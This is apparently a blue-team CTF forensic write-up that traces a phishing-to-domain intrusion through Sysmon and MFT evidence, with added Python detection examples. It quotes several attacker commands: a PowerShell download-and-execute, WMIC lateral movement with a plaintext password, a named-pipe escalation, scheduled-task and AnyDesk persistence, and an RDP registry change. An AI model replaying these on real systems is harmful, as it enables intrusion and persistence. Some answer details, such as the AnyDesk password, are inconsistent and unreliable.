Zerologon
Published: 2026-04-20 17:57 | Last Updated: 2026-05-13 17:28
https://cyberdefenders.org/blueteam-ctf-challenges/zerologon/

Context
Your role as a Tier 2 SOC Analyst at EliteSystems Corp is put to the test following an alert from the Tier 1 team about a confirmed phishing email leading to a potential network-wide intrusion. With disk data already triaged and ready for analysis, you must uncover the extent of this intrusion and identify the compromised assets within the network.
Basic triage
I checked Sysmon event ID 1 (process creation) on the system:
2024-01-02 19:44:02.245
User: ELITESYSTEMS\esmith
ParentImage: C:\Users\esmith\AppData\Local\Temp\easygoing.exe
CommandLine C:\Windows\system32\rundll32.exe
cmd.exe /C netstat -anop tcp
cmd.exe /C nslookup DC01
cmd.exe /C nslookup FIN-PC
cmd.exe /C nslookup FileServer
cmd.exe /C nslookup IT-PC
Get-ADComputer -Filter * -Properties * | Export-CSV "C:\Users\esmith\Appdata\Local\Temp\ADComputers.csv" -NoTypeInformation
C:\Windows\system32\cmd.exe /C dir /s *file/ Microsoft.ActiveDirectory.Management.dll
C:\Windows\system32\cmd.exe /C dir /s *file/ Microsoft.ActiveDirectory.Management.dll
IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:25816/'); Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\Users\esmith\Appdata\Local\Temp\found_shares.txt
2024-01-02 20:44:
ParentImage C:\Windows\System32\rundll32.exe
C:\Windows\system32\cmd.exe /c echo ddb867670d7 > \\.\pipe\308808
C:\Windows\system32\cmd.exe /C wmic /node:192.168.202.126 /user:FileShareService /password:MYpassword123# logicaldisk get caption,description,drivetype,providername,volumename (lateral movement to the file share)
C:\Windows\system32\cmd.exe /C wmic logicaldisk get caption,description,drivetype,providername,volumename
2024-01-02 21:35:06.488
C:\Windows\system32\cmd.exe /C schtasks /create /tn "ChromeUpdater" /tr "powershell -File 'C:\Users\esmith\AppData\Local\ChromeUpdater\ChromeUpdate.ps1'" /sc onlogon /ru System
2024-01-02 21:59:32.444
powershell -nop -exec bypass -EncodedCommand .\localdisk.ps1
Initial triage of the victim's environment revealed a phishing email sent to esmith@elitesystemscorp.xyz containing a malicious attachment named documents.zip.
Forensic analysis of the Master File Table ($MFT) using MFTECmd.exe and the system event logs provided the timeline of execution. The parent image C:\Users\esmith\AppData\Local\Temp\easygoing.exe was observed spawning multiple suspicious child processes, including network discovery (netstat, nslookup), Active Directory enumeration, lateral movement attempts via the Windows Management Instrumentation Command-line (WMIC), and the execution of a malicious PowerShell script.
Questions
Q1 Analyzing the attack chain requires identifying the file that initiated the payload execution. Which shortcut file was generated after executing the payload-containing file extracted from the ZIP archive?
When a user opens a file through Windows Explorer, the operating system automatically creates a corresponding LNK (shortcut) file in the user's Recent Items folder. By parsing the $MFT with MFTECmd.exe and comparing creation timestamps, we correlated the opening of the ZIP file with its shortcut artifact.
.\MFTECmd.exe -f 'C:\Users\Administrator\Desktop\Start Here\Artifacts\FIN-PC\$MFT' --csv "C:\Users\Administrator\Desktop" --csvf "mft.csv"
C:\Users\esmith\Downloads\documents.zip
documents.lnk (Created: 2024-01-01 20:00:24).
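The correlation described above, as an added example that is not part of the original writeup: a few constructed rows in MFTECmd's CSV layout (the column names ParentPath, FileName, Extension and Created0x10 are assumed to match MFTECmd's output) are scanned for LNK files created within a short window after the pivot file, and the one sharing the ZIP's stem is flagged.

```python
import csv
import io
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

# Constructed rows in MFTECmd's CSV layout (only the four columns this script
# reads). Times follow the writeup's timeline; the zip timestamp is made up.
SAMPLE_MFT_CSV = r"""ParentPath,FileName,Extension,Created0x10
.\Users\esmith\Downloads,documents.zip,.zip,2024-01-01 19:58:31.0000000
.\Users\esmith\AppData\Roaming\Microsoft\Windows\Recent,documents.lnk,.lnk,2024-01-01 20:00:24.0000000
.\Users\esmith\AppData\Roaming\Microsoft\Windows\Recent,report.lnk,.lnk,2023-12-20 09:12:00.0000000
.\Users\esmith\AppData\Local\Temp,easygoing.exe,.exe,2024-01-01 20:00:31.0000000
"""


def parse_mft_time(value):
    """Parse MFTECmd's 'YYYY-MM-DD HH:MM:SS.fffffff' (seven fractional digits)."""
    base, _, frac = value.strip().partition(".")
    stamp = datetime.strptime(base, "%Y-%m-%d %H:%M:%S")
    # datetime only carries microseconds, so keep the first six digits.
    return stamp + timedelta(microseconds=int((frac + "000000")[:6]))


def lnk_after_pivot(csv_text, pivot_name, window_minutes=10):
    """List .lnk records created within window_minutes after the pivot file.

    Each hit carries the shortcut path, its creation time, the delay after the
    pivot and whether its stem matches the pivot's (documents.zip -> documents.lnk).
    """
    rows = list(csv.DictReader(io.StringIO(csv_text)))
    pivot = next(r for r in rows if r["FileName"].lower() == pivot_name.lower())
    t0 = parse_mft_time(pivot["Created0x10"])
    stem = PureWindowsPath(pivot_name).stem.lower()
    hits = []
    for r in rows:
        if r["Extension"].lower() != ".lnk":
            continue
        created = parse_mft_time(r["Created0x10"])
        delay = (created - t0).total_seconds()
        if 0 <= delay <= window_minutes * 60:
            hits.append({
                "path": r["ParentPath"] + "\\" + r["FileName"],
                "created": created,
                "delay_seconds": delay,
                "same_stem": PureWindowsPath(r["FileName"]).stem.lower() == stem,
            })
    return sorted(hits, key=lambda h: h["delay_seconds"])


if __name__ == "__main__":
    for hit in lnk_after_pivot(SAMPLE_MFT_CSV, "documents.zip"):
        print(hit)
```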
Q2 It's essential to gather as much information as possible about the attack. Can you identify the malicious script inside the ZIP archive?
Further review of the $MFT extraction surrounding the documents.zip directory path revealed the specific payloads extracted by the user.
Since the question asks for the script, the answer must be:
eyewear.bat
Q3 By identifying the C2 IP address, we can gather clues about the attacker, such as their possible location, identity, or affiliation, and understand their motives. Can you identify the C2 IP address?
Using Sysmon event ID 3 (network connection) associated with the execution of the payload:
2024-01-02 08:28:46.122
C:\Users\esmith\AppData\Local\Temp\easygoing.exe
192.168.202.197 42.63.200.142
port 80
42.63.200.142
Q4 A key step in an attacker's strategy is reconnaissance. What command was used to gather and export data about the domain's computers?
We already found the corresponding command during basic triage:
Get-ADComputer -Filter * -Properties * | Export-CSV "C:\Users\esmith\Appdata\Local\Temp\ADComputers.csv" -NoTypeInformation
The attacker utilized a built-in PowerShell Active Directory cmdlet to perform extensive network reconnaissance.
The -Filter * parameter was used to query the Domain Controller for all computer objects without exception.
The -Properties * parameter forced the Domain Controller to return all hidden and extended attributes for each machine (which can leak sensitive data such as OS versions, exact IPs, and administrator descriptions).
Q5 With escalated privileges, an attacker can typically do more damage. What command did the attacker use to attempt privilege escalation?
From the basic triage:
2024-01-02 20:44:
ParentImage C:\Windows\System32\rundll32.exe
C:\Windows\system32\cmd.exe /c echo ddb867670d7 > \\.\pipe\308808
The attacker abused Named Pipe Impersonation to elevate privileges.
- By utilizing their current permissions (likely a service account holding SeImpersonatePrivilege, which is often associated with web server and database accounts), the malware created a named pipe (308808).
- It then forced a highly privileged process (SYSTEM) to interact with this pipe via the echo command. This allowed the malware to call the ImpersonateNamedPipeClient() API and steal the SYSTEM access token.
echo ddb867670d7 > \\.\pipe\308808
Q6 We need to assess the severity of the breach. Was the attacker able to compromise any user account? Can you provide the password of the user account the attacker compromised?
We also found this during basic triage:
C:\Windows\system32\cmd.exe /C wmic /node:192.168.202.126 /user:FileShareService /password:MYpassword123# logicaldisk get
The Windows Management Instrumentation Command-line (WMIC) is a deprecated tool providing a command-line interface for WMI to manage Windows components, hardware, and software. It is heavily abused for lateral movement by executing commands or binaries on remote hosts using valid credentials.
MYpassword123#
Q7 To ensure complete eradication, identifying and removing persistence mechanisms is essential to ensure the attacker can no longer access the compromised system. What's the command used by the attacker to achieve persistence?
As with the previous questions, this was already found during triage:
2024-01-02 21:35:06.488
schtasks /create /tn "ChromeUpdater" /tr "powershell -File 'C:\Users\esmith\AppData\Local\ChromeUpdater\ChromeUpdate.ps1'" /sc onlogon /ru System
Q8 Identifying the targeted data for exfiltration allows the organization to understand the potential impact of the breach and the data's confidentiality level. What's the full path of the folder whose data was targeted by the PowerShell script?
Analysis of the UsnJrnl indicated that after the attacker executed localdisk.ps1, a new folder named C:\data was created.

The journal showed that ZIP archives (e.g., administrator.zip, esmith.zip) were being created inside this folder, packaging data directly from the user directories.

So the answer must be:
C:\users
Q9 To understand the spread of the intrusion and discover possible lateral movement attempts, what is the name of the malicious service installed remotely on FileServer?
Reviewing event ID 11 on FileServer revealed a suspicious, randomly generated service name:
075b12b
Q10 Credential dumping can significantly expand the breach's impact, giving attackers access to numerous systems and data. Can you identify the process name that dumped credentials?
The attacker utilized a built-in Windows executable to dump credentials from memory (likely interacting with LSASS), bypassing standard execution restrictions via Living-off-the-Land (LotL) techniques.
This was identified from Sysmon event ID 10 (process access) on the FileServer:
rundll32.exe
Q11 Attackers usually install software on a target system to maintain long-term access, move laterally, access other systems, and expand their reach. What remote access software did the attacker install on one of the machines?
I checked the Sysmon event ID 1 logs:

FileServer.elitesystems.local 2024-01-02 21:21:42 C:\Windows\system32\cmd.exe /C echo Qwerty123!@#! | AnyDesk.exe --set-password
AnyDesk
Q12 What password did the attacker set for the installed software?
Qwerty123!@#_!
Q13 Attackers often enable RDP for more control. What command was used by the attacker to enable RDP?
To enable RDP, the attacker has to set the fDenyTSConnections registry value to 0.
I navigated to Sysmon event ID 1 on DC01 and filtered for that registry key:

reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
The kill chain
The network intrusion began with a successful phishing attack delivering a malicious ZIP archive (documents.zip). Upon user interaction, the payload (easygoing.exe) was executed, establishing a Command & Control (C2) connection with 42.63.200.142.
The threat actor moved swiftly through the cyber kill chain:
- Reconnaissance: Enumerated the entire Active Directory structure using PowerShell.
- Privilege Escalation: Successfully acquired SYSTEM rights via Named Pipe Impersonation.
- Lateral Movement: Used compromised credentials (FileShareService/MYpassword123#) to pivot to the FileServer via WMIC.
- Collection & Exfiltration: Scripted the automated compression of user profiles located in C:\Users into a staging directory (C:\data).
- Persistence: Established multiple backdoors, including a disguised Scheduled Task ("ChromeUpdater"), an unauthorized AnyDesk installation, and the manual enablement of Remote Desktop Protocol (RDP) via Registry manipulation.
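As an added example that is not part of the original writeup, a small Python triage routine that maps process-creation command lines like those quoted in Q4 (AD export), Q5 (named-pipe echo), Q6 (WMIC pivot), Q7 (scheduled task), Q11 (AnyDesk password) and Q13 (RDP registry change) to the kill-chain stages listed above. The sample command lines and the regex rules are constructed here; credentials in the samples are placeholders.

```python
import re

# Constructed Sysmon event ID 1 command lines modelled on the writeup's, plus
# one discovery command that the rules below deliberately leave unflagged.
SAMPLE_COMMANDS = [
    r'cmd.exe /c echo ddb867670d7 > \\.\pipe\308808',
    r'cmd.exe /C wmic /node:192.168.202.126 /user:FileShareService /password:PLACEHOLDER logicaldisk get caption',
    r'cmd.exe /C schtasks /create /tn "ChromeUpdater" /tr "powershell -File C:\Users\esmith\AppData\Local\ChromeUpdater\ChromeUpdate.ps1" /sc onlogon /ru System',
    r'cmd.exe /C echo PLACEHOLDER | AnyDesk.exe --set-password',
    r'reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0',
    r'powershell Get-ADComputer -Filter * -Properties * | Export-CSV C:\Users\esmith\AppData\Local\Temp\ADComputers.csv',
    r'cmd.exe /C netstat -anop tcp',
]

# (kill-chain stage, technique label, pattern); patterns are case-insensitive.
RULES = [
    ("Privilege Escalation", r"named pipe impersonation (echo into \\.\pipe)",
     re.compile(r"echo\s+\S+\s*>\s*\\\\\.\\pipe\\", re.I)),
    ("Lateral Movement", "wmic /node with explicit credentials",
     re.compile(r"\bwmic\b.*?/node:\S+.*?/password:", re.I)),
    ("Persistence", "scheduled task running as SYSTEM",
     re.compile(r"\bschtasks\b.*?/create.*?/ru\s+system\b", re.I)),
    ("Persistence", "AnyDesk unattended-access password set",
     re.compile(r"anydesk\.exe\s+--set-password", re.I)),
    ("Persistence", "RDP enabled via fDenyTSConnections=0",
     re.compile(r"\breg\s+add\b.*terminal server.*fDenyTSConnections.*?/d\s+0\b", re.I)),
    ("Reconnaissance", "Get-ADComputer -Filter * exported to CSV",
     re.compile(r"Get-ADComputer\s+-Filter\s+\*.*?Export-CSV", re.I)),
]


def classify(command_line):
    """Return every (stage, technique) whose rule matches the command line."""
    return [(stage, tech) for stage, tech, rx in RULES if rx.search(command_line)]


def triage(command_lines):
    """Build a stage-tagged report; unmatched lines are dropped, not reported."""
    report = []
    for line in command_lines:
        for stage, tech in classify(line):
            report.append({"stage": stage, "technique": tech, "command": line})
    return report


if __name__ == "__main__":
    for entry in triage(SAMPLE_COMMANDS):
        print(f'{entry["stage"]:<22} {entry["technique"]}')
```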